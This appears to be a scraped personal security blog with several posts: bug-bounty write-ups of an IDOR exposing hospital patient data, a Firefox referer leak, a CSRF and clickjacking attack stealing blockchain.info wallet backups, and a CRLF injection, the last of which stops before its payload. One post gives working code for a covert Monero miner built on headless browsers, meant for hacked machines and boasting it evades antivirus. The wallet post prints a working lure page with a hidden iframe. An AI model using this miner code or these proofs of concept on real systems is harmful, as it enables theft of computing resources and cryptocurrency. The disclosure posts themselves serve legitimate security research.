<a href="https://1.bp.blogspot.com/-CTfVGnEy59g/WqWmqs7h7EI/AAAAAAAADyQ/rszlzfKjeZAMKQwcwJYDoVTnvEnOR_trQCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.26.40%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="805" data-original-width="1600" height="322" src="https://1.bp.blogspot.com/-CTfVGnEy59g/WqWmqs7h7EI/AAAAAAAADyQ/rszlzfKjeZAMKQwcwJYDoVTnvEnOR_trQCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.26.40%2BAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Now there is an option to print IPR form. When I clicked on it. I got my IPR form auto-filled.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_5EtZnwGQDQ/WqWnkB9OCiI/AAAAAAAADyc/E2PByUxY7qMVcIvxZgzeAAoO_vVIW91SgCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.30.53%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="983" data-original-width="1600" height="392" src="https://1.bp.blogspot.com/-_5EtZnwGQDQ/WqWnkB9OCiI/AAAAAAAADyc/E2PByUxY7qMVcIvxZgzeAAoO_vVIW91SgCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.30.53%2BAM.png" width="640" /></a></div>
<br />
The autofill request bought me into suspicion hence. I tried to look whats was going on in the background.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LMv1T43t5NQ/WqWn62M7uyI/AAAAAAAADyg/nza_F8VqJNAl7S38CtGGHb_jSMnm1C6owCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.34.05%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="1600" height="138" src="https://1.bp.blogspot.com/-LMv1T43t5NQ/WqWn62M7uyI/AAAAAAAADyg/nza_F8VqJNAl7S38CtGGHb_jSMnm1C6owCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.34.05%2BAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So the URL was<br />
"<a href="https://www.askapollo.com/physical-appointment/PrintIPRForm.aspx?hashKey=1153433">https://www.askapollo.com/physical-appointment/PrintIPRForm.aspx?hashKey=11534</a>XX"<br />
<br />
Unfortunately hash key was not at all a hash, it was a plain sequential number. I tried to reduce the sequential ID. VIOLA an IDOR, I could see other persons IPA form which had sensitive informations like<br />
Name<br />
Address<br />
DOB<br />
Phone number<br />
Email etc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-FHGmUDNsZUg/WqWoyR3yiUI/AAAAAAAADyo/Q7H7pyJTkJYXCOSuNAMOaojBvQmSc1ezgCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.36.47%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="928" data-original-width="1600" height="370" src="https://2.bp.blogspot.com/-FHGmUDNsZUg/WqWoyR3yiUI/AAAAAAAADyo/Q7H7pyJTkJYXCOSuNAMOaojBvQmSc1ezgCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.36.47%2BAM.png" width="640" /></a></div>
<br />
<br />
My sequential id was 11534XX which is (7 digits)... So, around 1 MILLION details of users could possibly get leaked if went in wrong hands.<br />
<br />
I would like to thank Elliot again for creating awareness among Indian companies about the importance of security when everything is getting online.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nR0x0FRQ7_A/Wqw83esbKoI/AAAAAAAADzI/AFjgEe1JH4kw9n42P8BFOsGJy0CVW1pUwCLcBGAs/s1600/Screen%2BShot%2B2018-03-17%2Bat%2B3.22.51%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="1288" height="472" src="https://2.bp.blogspot.com/-nR0x0FRQ7_A/Wqw83esbKoI/AAAAAAAADzI/AFjgEe1JH4kw9n42P8BFOsGJy0CVW1pUwCLcBGAs/s640/Screen%2BShot%2B2018-03-17%2Bat%2B3.22.51%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
Final words<br />
<br />
We talk about Digital India but we are lacking very basic security measures almost everywhere. And as we are going more and more digital it's very essential that companies should handle their customer's data in a secure manner and one of the best methods is to have a responsible disclosure program.<br />
<br />
A responsible disclosure policy is the initial first step in helping protect your company from an attack or premature vulnerability release to the public. The best part is they aren’t hard to set up and provide your team peace of mind when a researcher discovers a vulnerability. Getting started with responsible disclosure simply requires a security page that states –<br />
<br />
What parts or sections of a site are within testing scope.<br />
The types of bugs and vulns that are valid for submission.<br />
A dedicated security email address to report the issue (often security@example.com).<br />
<br />
https://www.bugcrowd.com/resource/what-is-responsible-disclosure/ (For more details)<br />
<br />
If we look into counties like the USA... Their airforce, pentagon, defense websites, etc. have also adopted responsible disclosure program. These actions and understanding make the USA ahead of India.<br />
Example is here<br />
https://hackerone.com/htaf2<br />
<br />
If we look at facts and figures. Indians received the highest amount of rewards from facebook.com's bug-bounty program. Facebook rewards ethical hackers for finding and reporting security vulnerabilities on Facebook's website. This means we do have resources but we are neglecting it.<br />
<br />
~Source<br />
https://www.facebook.com/notes/facebook-bug-bounty/facebook-bug-bounty-5-million-paid-in-5-years/1419385021409053/<br />
<br />
Another source<br />
<br />
https://economictimes.indiatimes.com/tech/internet/bsnl-isro-cases-show-india-not-a-country-for-ethical-hackers/articleshow/63278882.cms?from=mdr<br />
<br />
Indian companies need to be more open towards ethical hackers rather than being orthodox. Blogging about this bug was not to shame anyone. Its to spread awareness that we have to take security seriously, which is highly neglected in India.<br />
<br />
Let's make the Internet a safer place :)<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com4tag:blogger.com,1999:blog-499911195830393683.post-52783956412397090912018-02-01T21:08:00.000+05:302019-08-17T15:14:36.061+05:30Firefox quantum browser referer leakage bug <div dir="ltr" style="text-align: left;" trbidi="on">
This is one of the security issues I found while investigating another security bug. This was a security misconfiguration in Firefox Quantum browsers (v56 and above) which could leak sensitive URLs through referer header.<br />
<br />
I would like to explain this bug in details!<br />
<br />
<b>What are referer headers?</b><br />
<b><br /></b> The Referer request-header contains the address of the previous web page from which a link to the currently requested page was followed. The Referer header allows servers to identify where people are visiting them from and may use that data for analytics, logging, or optimized caching, etc.<br />
<br />
source (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer)<br />
<br />
So in simple words, when we are moving across a website or navigating across webpages, the next request has a referer header which has the URL details of the previous page.<br />
<br />
Yes, its spelled as referer. Someone in the past mistook "referrer" as referer, and we are carrying it forward :)<br />
<br />
<b>Abuse of referer headers!</b><br />
<br />
But this functionality became security issues at certain places.<br />
<br />
For a modern web app. It's very common to have a password reset features, which sends you a password reset token to your email with which we can reset our passwords. The URL will be something like<br />
<br />
https://www.somewebsite.com/passreset?token=thetoken<br />
<br />
Now ist very common for a modern web app to have images hosted over CDN, or external javascript files as well as some external links on the footer page when the password reset page is opened. When these urls are called, or any external link is clicked, the referer header is carried along<br />
<br />
https://www.somewebsite.com/passreset?token=thetoken<br />
<br />
Hence its leaking your password reset token, or perhaps session tokens, etc. to an external website.<br />
<br />
So one of our 3rd party might be getting all your user's password reset tokens in their logs.<br />
Bad right?<br />
<br />
<b>The fix:- </b><br />
<b><br /></b> The HTML attribute<br />
<b><br /></b> <b>rel="noopener noreferrer" </b><br />
<br />
is used to instruct the browser not to send any referer header upon clicking the external link.<br />
<br />
So if your website has a footer which links to suppose "shashank.co" and as a website owner, you wish that your client's referer header is not leaked to "shashank.co". So you do this!<br />
<br />
<blockquote class="tr_bq">
<b><a href="https://www.shashank.co" target="_blank" rel="noopener noreferrer">', '</a></b></blockquote>
<br />
The above code will fix this issue.<br />
<br />
<br />
Now the Firefox quantum browser was failing to act on <b>rel="noopener noreferrer" </b>and was still sending referer headers to external links.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-dRItJuK5X1M/WnI_OD-fU7I/AAAAAAAADtM/MSt-jesUTR4fmdTz5mW8KZZR6pH3m_VmACLcBGAs/s1600/quantumbug.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="874" data-original-width="1600" height="347" src="https://2.bp.blogspot.com/-dRItJuK5X1M/WnI_OD-fU7I/AAAAAAAADtM/MSt-jesUTR4fmdTz5mW8KZZR6pH3m_VmACLcBGAs/s640/quantumbug.png" width="640" /></a></div>
<br />
<br />
I reported this bug. Unfortunately, it was duplicate of some similar report which was pointed out for pinned tabs. I still have no idea how someone spotted for pinned tabs when it was also not working for normal tabs with external links.<br />
<br />
This bug has been fixed in Firefox v59 (Beta).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-yo5JQEDbMnw/WnJAH0w244I/AAAAAAAADtQ/7VVxAwhSBjsNFIXCUlwYIHpkxj37TI8rgCEwYBhgL/s1600/Screen%2BShot%2B2018-02-01%2Bat%2B3.45.31%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1478" height="413" src="https://2.bp.blogspot.com/-yo5JQEDbMnw/WnJAH0w244I/AAAAAAAADtQ/7VVxAwhSBjsNFIXCUlwYIHpkxj37TI8rgCEwYBhgL/s640/Screen%2BShot%2B2018-02-01%2Bat%2B3.45.31%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-23380986238721491842018-01-13T04:55:00.000+05:302019-08-17T15:21:28.937+05:30Writing a silent cryptocurrency miner (Monero) in 6 lines of code<div dir="ltr" style="text-align: left;" trbidi="on">
Hidden Crypto currency mining has always been a game for blackhat hackers to make money out of it. After reading a lot of blog and news about hackers injecting silent miners to hacked computers, servers and websites, I thought of playing with it.<br />
<br />
<b><i>Note this blog is just for awareness of cryptocurrency hidden miners. I am not responsible for what my readers do with my codes. And I never suggest anyone deploy cryptocurrency miners on unauthorized computers. </i></b><br />
<br />
<b>Lets first understand what mining is?</b><br />
<br />
Cryptocurrency mining includes two functions, i.e., adding transactions to the blockchain (securing and verifying) and also releasing new currency. Individual blocks added by miners should contain a proof-of-work or PoW.<br />
Mining needs a computer and a special program(provided by developers of the community), which helps miners compete with their peers in solving complicated mathematical problems. This would need huge computer resources. In regular intervals, miners would attempt to solve a block having the transaction data using cryptographic hash functions.<br />
<br />
Now, as we already know that bitcoin transactions are kind of traceable. Hard but still possible. So in the recent trends, I found that most of the blackhat hackers shifted to monero mining. When I heard about monero in the news I wanted to figure out why monero?<br />
<br />
<b>The reasons are:-</b><br />
<br />
1) Monero is private and untraceable crypto currency.<br />
<br />
But this doesn't fully answer our question because there are other cryptocurrencies too, which are untraceable like zcash, dash (earlier know as dark coin), verge, etc.<br />
<br />
After a bit more research, I found my answer.<br />
<br />
2) Monero uses "cryptonote" algorithm. Which rules out asci miners and hence mining is dependent on CPU and GPU, which means the mining difficulty is lower than what we have with bitcoin also it is better suited for regular consumer laptops and PCs.<br />
<br />
This makes CPU mining feasible for users and a golden opportunity for hackers to bot/mass mine Monero on hacked computers.<br />
<br />
Next question was how simple can this be?<br />
Let's learn it by doing it!<br />
<br />
<b>Building a Monero Miner Linux (Ubuntu for example):-</b><br />
<br />
Note:- I am a horrible coder. Hence I try to make my codes easy, to write less number of lines with less complexity no matter how horrible the code is. I am fine if it works :)<br />
<br />
<b>Preparing a list, how to make a silent miner!</b><br />
<br />
1) A reliable miner manager.<br />
2) Make it run invisible/silently on a system.<br />
<br />
The best miner I could fine was a javascript one. Created by "https://coinhive.com/." It's free to signup, and they take 30% commission for using their miner.<br />
<br />
But then this a browser based miner, to execute it on a hacked system we need to fire the miner in a system's browser and that too invisible.<br />
<br />
As far as I knew that for browser automation, selenium is used.<br />
<br />
Now we just embed our javascript code from coinhive and use our API public API key to trigger the miner.<br />
<br />
<b>Code file.html</b><br />
<br />
<blockquote class="tr_bq">
<HTML><br />
<head><br />
<span style="white-space: pre;"> </span><title>Test</title><br />
</head><br />
<body><br />
<script src="https://coinhive.com/lib/coinhive.min.js"></script><br />
<script><br />
<span style="white-space: pre;"> </span>var miner = new CoinHive.Anonymous('3yvOKgHxX9ZsPB9x78IjhQ1C4xCDDhJx');<br />
<span style="white-space: pre;"> </span>miner.start();<br />
</script><br />
</body><br />
</HTML></blockquote>
<br />
<br />
<br />
Next step is to open the HTML file silently on a system's browser. So we host our file somewhere . And make selenium trigger the URL.<br />
<br />
First, we need to install dependencies. I wrote a script that installs all the dependencies in one go.<br />
<br />
<b>Code script.py</b><br />
<blockquote class="tr_bq">
<br />
import os<br />
os.system("apt-get -y install python3-pip")<br />
os.system("pip3 install selenium")<br />
os.system("pip3 install pyvirtualdisplay")<br />
os.system("apt-get -y install firefox xvfb")<br />
os.system("wget http://yourwebsite.com/geckodriver")<br />
os.system("mv geckodriver /usr/local/bin")<br />
os.system("chmod 7777 /usr/local/bin/geckodriver")<br />
os.system("sudo python3 selenium_miner.py") </blockquote>
<br />
Understanding the code:-<br />
So we are installing python virtual display which is a wrapper of xvfb for python.<br />
Selenium which is required for browser automation.<br />
And then we need geckodriver for triggering Firefox from selenium.<br />
<br />
Gecko driver for Linux can be downloaded from here<br />
<br />
"https://github.com/mozilla/geckodriver/releases"<br />
<br />
When we unzip the downloaded file from there, we get geckodriver file in it. In 5th line, I am just fetching the unzipped file from my own server.<br />
<br />
In 6th line, I am moving it to the bin directly so as I don't have to mention the path of geckodriver in my further code<br />
<br />
The last line finally calls the miner file to run, whose code is below.<br />
<br />
<br />
<b>Code selenium_miner.py</b><br />
<br />
<blockquote class="tr_bq">
from pyvirtualdisplay import Display<br />
from selenium import webdriver<br />
display = Display(visible=0, size=(1024, 768))<br />
display.start()<br />
browser = webdriver.Firefox()<br />
browser.get('http://www.yourwebsite.com/file.html')</blockquote>
<br />
<br />
<br />
This code simply made the visibility to zero and calls the URL where the miner is hosted (our file.html). Since I didn't exit the selenium, so the HTML file is open in a hidden firefox browser, till the system is running and the HTML file with the javascript code is using the systems CPU for mining Monero.<br />
<br />
<b>Windows miner:-</b><br />
<br />
There are two ways of doing it.<br />
Since there is no available wrapper for python virtual driver, I had to look for an alternative.<br />
<br />
I found that phantomjs provides a ghost browser for windows<br />
<br />
<b>Code windows_miner1.py</b><br />
<br />
<blockquote class="tr_bq">
from selenium import webdriver<br />
path="C:\\Python27\\python\\phantom\\bin\\phantomjs.exe"<br />
browser = webdriver.PhantomJS(path)<br />
browser.get('http://www.yourwebsite.com/file.html')</blockquote>
<br />
<br />
In the code above the path, a variable is to set the path of your phantom js ghost driver which can be downloaded from here<br />
<br />
"http://phantomjs.org/download.html"<br />
<br />
In the bin folder, there is a phantomjs.exe. That path is to be mentioned in the variable.<br />
<br />
<br />
This was my first approach. But then I went for a more straightforward approach. While strolling the internet, I found that chrome had enabled headless mode. That's all we need :)<br />
<b><br /></b> <b>Code windows_miner2.py</b><br />
<br />
<blockquote class="tr_bq">
import os<br />
import subprocess<br />
path = subprocess.Popen(['cd'], stdout=subprocess.PIPE, shell=True)<br />
for line in path.stdout:<br />
<span style="white-space: pre;"> </span>continue<br />
path.wait()<br />
paths = (str(line).strip()) + "\Gchrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://www.yourwebsite.com/file.html"<br />
os.system(paths)</blockquote>
<br />
Where Gchome is your portable chrome executable or simply mention the file path of your chome.exe file.<br />
<br />
Now many readers will think why did I ever write python code for windows miner because windows systems don't have python installed by default.<br />
<br />
Because I am not good with c and c++ and I figured out py2exe. Tried and tested on my system, works like a charm!<br />
<br />
Go to "http://py2exe.net" and get your executable.<br />
<br />
Now comes the final question! How do I prevent hackers from stealing my CPU resources for their benefits?<br />
<br />
My answer is feeling your loving PC <3. If you ever find your system fans working all the time even though you are not performing a heavy task. Go to your task manager and check if any unusual program is using all the remaining CPU resources.<br />
<br />
If you see a sudden spike in CPU resources of your server. Use the command "top" in your server terminal to check if any unwanted program is using your CPU resources.<br />
<br />
The best part is since everything is happening over the browser that too with javascript, it will go undetected from most of the anti-viruses.<br />
<br />
All the source codes can be found here<br />
<a href="https://github.com/Shashank-In/silent-monero-miner">https://github.com/Shashank-In/silent-monero-miner</a><br />
<br />
Stay safe ;-)<br />
Cheers Shashank<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-5428112877288188912017-11-11T20:09:00.000+05:302019-08-17T15:45:00.303+05:30Stealing bitcoin wallet backups from blockchain.info<div dir="ltr" style="text-align: left;" trbidi="on">
Oauth, where many bugs arise :)<br />
<br />
This was one of my finding for the bug-bounty program of blockchain.info, where I was able to steal anyone's bitcoin wallet backup of their <a href="http://blockchain.info/">blockchain.info</a> account with negligible user interaction.<br />
<br />
<br />
If you want to know what was this wallet backup feature meant for, you can check here.<br />
<br />
<blockquote class="tr_bq">
<a href="https://blog.blockchain.com/2014/06/12/tutorial-backup-basics-the-best-ways-to-backup-your-blockchain-wallet/">https://blog.blockchain.com/2014/06/12/tutorial-backup-basics-the-best-ways-to-backup-your-blockchain-wallet/</a></blockquote>
<br />
[P.S This feature has been removed after the bug was reported. Sad! ]<br />
<br />
So basically it created a JSON file which was the backup of your account which you could<br />
Download, Email yourself or store it directly on your Gdrive and Dropbox accounts. The bad part was that if someone else gets your JSON file, he can simply import it at blockchain.info and steal all your bitcoins from your account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-mpBLfjAWFWI/WgLKy4Zc2hI/AAAAAAAADrA/oLyJBts5Tc8NJLBd_IesmZGfBWylrREZgCLcBGAs/s1600/Wallet-Backup.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="131" data-original-width="608" height="136" src="https://3.bp.blogspot.com/-mpBLfjAWFWI/WgLKy4Zc2hI/AAAAAAAADrA/oLyJBts5Tc8NJLBd_IesmZGfBWylrREZgCLcBGAs/s640/Wallet-Backup.png" width="640" /></a></div>
<br />
<br />
Now the bug was in the implementation of storing it directly to Dropbox and Google Drive.<br />
<br />
<br />
I noticed once you click on Dropbox or Gdrive button, you will be asked to log in with your Google or Dropbox account and once its authorized blockchain will automatically store the backup file in your dropbox or Gdrive using your access token.<br />
<br />
<br />
When I looked more closely at all the requests, I found that if someone makes a Gdrive authentication at the end, the redirect URI was something like this.<br />
<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://blockchain.info/wallet/gdrive-update?code={YourGdriveToken}</span></blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TuJufAqSK6U/WgLSdIIqFgI/AAAAAAAADrQ/x9MHTYE_z5shyetleuX5TW7deQoOS0fogCLcBGAs/s1600/blockchain.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1600" height="272" src="https://1.bp.blogspot.com/-TuJufAqSK6U/WgLSdIIqFgI/AAAAAAAADrQ/x9MHTYE_z5shyetleuX5TW7deQoOS0fogCLcBGAs/s640/blockchain.PNG" width="640" /></a></div>
<br />
<br />
Noticed something bad? No CSRF token yay!!!!<br />
<br />
<br />
So all I had to do was<br />
1) authenticate my google account at blockchain.info<br />
2) Grab my drive token<br />
3) Send the below link to a victim.<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://blockchain.info/wallet/gdrive-update?code={MYGdriveToken}</span></blockquote>
4) Once the link is clicked, when the victim is logged in into his bitcoin wallet backup will be stored in my Google Drive account<br />
<br />
But a normal CSRF is boring. So clickjacking will serve as a catalyst for our attack :)<br />
<br />
Although the complete website has clickjacking protection, but this URL was frameable.<br />
<br />
<br />
So final POC<br />
<br />
<blockquote class="tr_bq">
<html><br />
<head><br />
<title>Some fancy bitcoin lottery page</title><br />
</head><br />
<body><br />
<p>You won a lottery just open this page when you are logged in to blockchain.info and amount will be credited to you </p><br />
<iframe sandbox="allow-scripts allow-forms" src="https://blockchain.info/wallet/gdrive-update?code={Attackers Gdrive Token}" style="width:1%;height:1%"></iframe><br />
</body><br />
</html></blockquote>
<br />
Once the victim lands on the page, a hiding iframe will be loaded, and the wallet will be stored on the attackers google drive.<br />
<br />
Bounty?<br />
Yes<br />
<br />
1600$<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-SJOQpR4bbF8/WgLTiYXwYJI/AAAAAAAADrY/sZi-jS8LxXUVJ7Wb6xbgwjXTCBYK26T9ACLcBGAs/s1600/Screen%2BShot%2B2017-11-08%2Bat%2B3.01.41%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="1592" height="260" src="https://1.bp.blogspot.com/-SJOQpR4bbF8/WgLTiYXwYJI/AAAAAAAADrY/sZi-jS8LxXUVJ7Wb6xbgwjXTCBYK26T9ACLcBGAs/s640/Screen%2BShot%2B2017-11-08%2Bat%2B3.01.41%2BPM.png" width="640" /></a></div>
<br />
<br />
They fixed the bug very quickly, and indeed, blockchain.info takes care of their security very seriously. Unfortunately, after reporting this issue, they took down the backup feature forever. Sorry for breaking the backup feature.<br />
<br />
Cheers<br />
Shashank :)<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-41118513630243918302017-11-05T14:08:00.000+05:302019-08-17T15:45:32.044+05:30CRLF injection in blockchain.info<div dir="ltr" style="text-align: left;" trbidi="on">
This bug was reported by me to "Blockchain.info" for their bug-bounty program.<br />
<br />
For those who don't know about <a href="https://blockchain.info/" rel="nofollow" target="_blank">blockchain.info</a><br />
<br />
"Blockchain.info is one of the world's most popular Bitcoin wallet and provides detailed information and charts on all Bitcoin transactions and blocks."<br />
<br />
<b>Understanding CRLF injection </b><br />
<b><br /></b> CRLF is CR(Carriage Return) and LF (Lined Feed or New Line) which is a non-printable ASCII character CR (ASCII value 13 also \r) and LF (ASCII value 10 also \n)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8q2rvoiFfBA/WfiHq600VRI/AAAAAAAADqA/eg0jWmoI9twKQXzrnjtH4o7A2PbSclhGgCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B7.54.05%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="380" data-original-width="1258" height="192" src="https://4.bp.blogspot.com/-8q2rvoiFfBA/WfiHq600VRI/AAAAAAAADqA/eg0jWmoI9twKQXzrnjtH4o7A2PbSclhGgCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B7.54.05%2BPM.png" width="640" /></a></div>
<br />
<br />
<br />
Now let's understand how CRLF is used in HTTP requests<br />
<br />
Whenever we click on a website or just open a website or do anything, a request is generated from your browser, and a response is sent back from the server to you which in turn displays us the website.<br />
<br />
For example, when we request blog.shashank.co in our browser. An HTTP request is sent<br />
<blockquote class="tr_bq">
http://blog.shashank.co/<br />
GET / HTTP/1.1<br />
Host: blog.shashank.co<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Connection: keep-alive<br />
Upgrade-Insecure-Requests: 1</blockquote>
<br />
And a response is sent from the server.<br />
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Content-Type: text/html; charset=UTF-8<br />
Expires: Tue, 31 Oct 2017 14:28:13 GMT<br />
Date: Tue, 31 Oct 2017 14:28:13 GMT<br />
Cache-Control: private, max-age=0<br />
Last-Modified: Tue, 31 Oct 2017 14:26:43 GMT<br />
ETag: W/"bf427f6283ea846b52644bb883f50252d472a65378d019392f78d16d43fe2f17"<br />
Content-Encoding: gzip<br />
X-Content-Type-Options: nosniff<br />
X-XSS-Protection: 1; mode=block<br />
Content-Length: 13871<br />
Server: GSE</blockquote>
<blockquote class="tr_bq">
<HERE IS THE WEBSITE BODY> </blockquote>
<br />
For people who are unaware of how I dumped these headers, you can simply download the "LiveHTTPHeader" plugin for Firefox browser. Or simply open inspect element in your browser and click on the "network tabs" to view how all the requests are being sent while you are browsing through any website.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-evd2MdIOux8/WfiJ_M9sY4I/AAAAAAAADqM/SNkTYeJw1c0mMxmEtoMZGgjNHoYwgiRdwCLcBGAs/s1600/Screen%2BShot%2B2017-10-31%2Bat%2B8.04.06%2BPM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1096" data-original-width="1530" height="457" src="https://4.bp.blogspot.com/-evd2MdIOux8/WfiJ_M9sY4I/AAAAAAAADqM/SNkTYeJw1c0mMxmEtoMZGgjNHoYwgiRdwCLcBGAs/s640/Screen%2BShot%2B2017-10-31%2Bat%2B8.04.06%2BPM.png" width="640" /></a></div>
<br />
<br />
Now every line in an HTTP header is separated by a CRLF (as said it is non-printable ASCII character). So its something like this.<br />
<br />
<blockquote class="tr_bq">
<br />
GET / HTTP/1.1 <b>[CRLF]</b><br />
Host: blog.shashank.co <b>[CRLF]</b><br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 <b>[CRLF]</b><br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <b>[CRLF]</b><br />
Accept-Language: en-US,en;q=0.5 <b>[CRLF]</b><br />
Accept-Encoding: gzip, deflate <b>[CRLF]</b><br />
Connection: keep-alive <b>[CRLF]</b><br />
Upgrade-Insecure-Requests: 1 <b>[CRLF]</b></blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK <b>[CRLF]</b><br />
Content-Type: text/html; charset=UTF-8 <b>[CRLF]</b><br />
Expires: Tue, 31 Oct 2017 14:28:13 GMT <b>[CRLF]</b><br />
Date: Tue, 31 Oct 2017 14:28:13 GMT<b> [CRLF]</b><br />
Cache-Control: private, max-age=0<b> [CRLF]</b><br />
Last-Modified: Tue, 31 Oct 2017 14:26:43 GMT <b>[CRLF]</b><br />
ETag: W/"bf427f6283ea846b52644bb883f50252d472a65378d019392f78d16d43fe2f17"<br />
Content-Encoding: gzip<b> [CRLF]</b><br />
X-Content-Type-Options: nosniff <b>[CRLF]</b><br />
X-XSS-Protection: 1; mode=block <b>[CRLF]</b><br />
Content-Length: 13871 <b>[CRLF]</b><br />
Server: GSE <b>[CRLF] [CRLF]</b></blockquote>
<br />
<blockquote class="tr_bq">
<HERE IS THE BODY></blockquote>
<br />
<b>The bug </b><br />
<b><br /></b> While I was going through the website, I found a place where I can download charts data in JSON and CSV format.<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en</span></blockquote>
<br />
The last parameter, "lang=en." I thought of playing with it and changed it to "lang=english."<br />
<br />
I noticed that the response header had a difference<br />
<br />
<blockquote class="tr_bq">
GET /charts/total-bitcoins?cors=true&format=csv&lang=<b>english</b> HTTP/1.1<br />
Host: api.blockchain.info<br />
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate, br<br />
Connection: keep-alive<br />
Upgrade-Insecure-Requests: 1<br />
HTTP/2.0 200 OK<br />
date: Tue, 31 Oct 2017 15:47:21 GMT<br />
content-type: text/csv; charset=ascii<br />
content-length: 10953<br />
access-control-allow-origin: *<br />
cache-control: public, max-age=60<br />
content-disposition: attachment; filename="total-bitcoins.csv"<br />
content-language: <b>english</b><br />
<removed></blockquote>
<br />
Ok so, the "lang" parameter is being reflected in the "content-language" header. Now the next step was to check for "CRLF" injection if we can add a CRLF and create our own response headers.<br />
<br />
Now to inject a CRLF, we have to URL encode it. So the URL encode of \r\n is "%0D%0A"<br />
<br />
Upon sending a request<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: white; color: #6b7272; font-family: "post grotesk" , "helvetica neue" , "arial" , sans-serif; font-size: 14px;">https://api2.blockchain.info/charts/total-bitcoins?cors=true&format=csv&lang=en%0ATEST</span></blockquote>
A new header was found in the response as TEST<br />
<br />
So there is a CRLF injection!!. Now since a request also contains response body, we can even execute javascript code (cross-site scripting) to steal cookies or frame a phishing page<br />
<br />
<br />
So the final payload<br />
<br />
<blockquote class="tr_bq">
